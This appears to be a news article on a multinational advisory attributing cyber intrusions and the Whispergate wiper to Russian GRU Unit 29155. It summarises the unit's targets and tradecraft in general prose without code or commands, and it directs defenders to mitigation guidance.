The UK’s National Cyber Security Centre (NCSC) and its counterpart bodies in the Five Eyes intelligence alliance have joined partners from Czechia, Estonia, Germany, Latvia and Ukraine to identify a Russian military cyber unit that has been conducting a sustained campaign of malicious activity over the past four years.
Part of the Main Directorate of the General Staff of the Armed Forces of the Russian Federation, or GRU, Unit 29155 has conducted multiple computer network intrusions over the years, deploying tools such as the Whispergate malware used in cyber warfare operations against Ukraine.
Whispergate, a malware not dissimilar to NotPetya, was deployed across Ukraine in advance of Russia’s illegal February 2022 invasion. It appears at first glance to operate like a ransomware locker, but its activity conceals its true purpose, which is to target systems master boot records for deletion.
That Whispergate was linked to Moscow’s intelligence services was already well-known but this is the first time that its use has been attributed to a specific advanced persistent threat (APT) operation.
“The exposure of Unit 29155 as a capable cyber actor illustrates the importance that Russian military intelligence places on using cyberspace to pursue its illegal war in Ukraine and other state priorities,” said NCSC operations director Paul Chichester.
“The UK, alongside our partners, is committed to calling out Russian malicious cyber activity and will continue to do so. The NCSC strongly encourages organisations to follow the mitigation advice and guidance included in the advisory to help defend their networks.”
Unit 29155, also designated as the 161st Specialist Training Centre, and designated by private sector threat researchers variously as Cadet Blizzard, Ember Bear (Bleeding Bear), Frozenvista, UNC2589 and AUC-0056, is likely composed of junior active-duty GRU personnel but is also known to fall back on third-party contractors, including known cyber criminals and their enablers, in the service of its operations. It differs to some extent from the more established GRU-backed APTs such as Unit 26165 (aka Fancy Bear) and Unit 74455 (aka Sandworm).
The NCSC said Unit 29155’s cyber operations selected and targeted victims primarily to collect information for espionage purposes, to deface their public-facing websites, cause reputational damage by stealing and leaking sensitive information, and sabotage their day-to-day operations.
According to the FBI, Unit 29155 has conducted thousands of domain scanning exercises across multiple Nato and European Union (EU) member states, with a particular focus on CNI, government, financial services, transport, energy and healthcare. The Americans say it may also have been responsible for physical acts of espionage including attempted coups and even assassination attempts.
Modus operandi
Unit 29155 frequently forages for publicly-disclosed CVEs in the service of its intrusions, often obtaining exploit scripts from public GitHub repositories, and is known to have targeted flaws in Microsoft Windows Server, Atlassian Confluence Server and Data Center, and Red Hat, as well as security products from China-based Dahua, an IP camera manufacturer, and Sophos.
It favours red teaming tactics and publicly available tools, rather than custom-built solutions, which in the past has likely led to some of its cyber attacks being attributed to other groups with which it overlaps.
As part of this activity, Unit 29155 maintains a presence in the underground cyber criminal community, running accounts on various dark web forums which it uses to obtain useful tools including malware and loaders.
During its attacks, Unit 29155 will generally use a VPN service to anonymise its operational activity and exploit weaknesses in internet-facing systems and use the CVEs mentioned above to obtain initial access.
Once inside its victim environment, it uses Shodan to scan for vulnerable Internet of Things (IoT) devices, including IP cameras such as the Dahua ones mentioned above, and uses exploitation scripts to authenticate to them with default usernames and passwords. It then tries to perform remote command execution via the web to these vulnerable devices which, if done successfully, allows them to dump their configuration settings and credentials in plain text.
Having successfully executed an exploit on a victim system, Unit 29155 can then launch a Meterpreter payload using a reverse Transmission Control Protocol (TCP) connection to communicate with its command and control (C2) infrastructure. For C2 purposes, Unit 29155 is known to have used a number of virtual private servers (VPSs) to host its operational tools, conduct recon activity, exploit victim infrastructure and steal data.
Once it has access to internal networks, Unit 29155 has been observed using Domain Name System (DNS) tunnelling tools to tunnel IPv4 network traffic, configuring proxies within the victim infrastructure and executing commands within the network using ProxyChains to provide further anonymity. It has also used the GOST open source tunnelling tool (via SOCKS5 proxy) named java.
In a number of attacks, Unit 29155 has been observed exfiltrating victim data to remote locations using the Rclone command-line program, as well as exfiltrating various Windows processes and artifacts including Local Security Authority Subsystem Service (LSASS) memory dumps, Security Accounts Manager (SAM) files, and SECURITY and SYSTEM event log files. Additionally, it compromises mail servers and exfiltrates artifacts including email messages via PowerShell.
More in-depth technical information, including new analysis of Whispergate, and mitigation guidance, is available from the US Cybersecurity and Infrastructure Security Agency in the main advisory notice. Defenders are urged to familiarise themselves with Unit 29155’s work and follow the recommendations laid down in the full advisory.